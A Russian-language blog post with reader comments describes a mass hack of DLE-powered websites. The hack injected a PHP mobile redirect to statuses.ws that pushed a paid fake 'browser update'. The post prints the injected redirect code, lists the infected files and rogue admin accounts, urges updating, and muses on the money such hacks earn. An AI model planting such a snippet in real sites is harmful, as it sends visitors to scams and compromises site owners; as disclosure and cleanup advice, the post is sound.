Массовый взлом DLE сайтов или сколько можно заработать на мобильном редиректе

Массовый взлом DLE сайтов или сколько можно заработать на мобильном редиректе
Массовый взлом DLE сайтов или сколько можно заработать на мобильном редиректе

Всем привет!  В предыдущей статье было рассказано, что такое мобильный редирект и как он организовывается. Вам скорее всего интересно узнать, сколько может принести подобный взлом. Тут все индивидуально и зависит от масштабов, скажем человек скупающий шеллы на античате может вполне получать 10-15 к/дейли, что касается ситуации с массовым взломом, то тут речь идет уже о других цифрах.

В начале января огромное количество DLE пользователей забило тревогу. На их сайтах появился хитрый мобильный редирект, организованный через домен statuses.ws. ИМХО целсофту вместо того, чтобы рассылать претензии следует хорошо поработать над защитой движка, так как в данном случае взлом имел массовый характер и ломали с большой долей вероятности автоматизированным скриптом.

Основные симптомы заражения — при попытке зайти с мобильного устройства на сайт качался файл, предлагающий обновить браузер, то, что обновление НЕ БЕСПЛАТНОЕ, думаю, вы догадались и сами.

Сам редирект содержал следующий код —
$iphone = strpos($_SERVER[‘HTTP_USER_AGENT’],»iPhone»);
$android = strpos($_SERVER[‘HTTP_USER_AGENT’],»Android»);
$palmpre = strpos($_SERVER[‘HTTP_USER_AGENT’],»webOS»);
$berry = strpos($_SERVER[‘HTTP_USER_AGENT’],»BlackBerry»);
$ipod = strpos($_SERVER[‘HTTP_USER_AGENT’],»iPod»);

if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header(‘Location: http://statuses.ws/’);
}

Причем на многих сайтах он был вставлен до 10 раз, что явно свидетельствует об автоматизации процесса. Как видно для конкретной OC были приготовлены «свои ништяки». Данный код был замечен чаще всего в файлах:
/engine/data/config.php
/engine/data/dbconfig.php
/engine/init.php

Также замечено появление новых пользователей с правами админа. Вставки попадались и в этих файлах:
engine/init.php
index.php

Грешить на хостера, неправильные права на папки и тд. уже не приходилось, речь шла о дырке в движке. Решение проблемы — обновиться до последней на данный момент версии 9.7 и пропатчить ее с оф. сайта.

Ну а теперь вкусности. Сколько же можно заработать таким образом? В интернете валяется полно скриншотов, скажем вот этот( за его правдоподобность не отвечаю, но судя по масштабам сумма вполне реальная):

Заработок на мобильной редиректе
Заработок на мобильной редиректе

Комментарии не требуются. От себя добавлю, что взлом сайтов — уголовно наказуемое занятие и отдел «К» при желании может дотянуться и до владельца сайта statuses.ws и до хостинга, но пока это не произошло. Также всем у кого есть сайты на DLE версии ниже 9.7 настоятельно рекомендую проверить эти файлы у себя на сервере.
Всем хорошего дня!

Понравилась статья? Поделиться с друзьями:
Комментарии: 24
  1. Анатолий

    Отличная статья.

  2. Зоофилия

    Да все они ломаются, будь то дле или еще что, че тут раздувать всякую пустоту не вижу смысла

  3. Гена

    Благо мой сайт остался целым и невредимым

  4. felix

    Сайты ломают не только на DLE, меня эта зараза неделю мучала на WordPress и Joomla. Знакомые также жаловались. Сволочи они, что сказать! Такие деньги ни к чему хорошему не приведут.

  5. Diman

    Было дело.После взлома моего сайта,перешел на Вордпресс. Дле неповоротливый и дырявый!!!

Добавить комментарий для Landorn Отменить ответ

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!: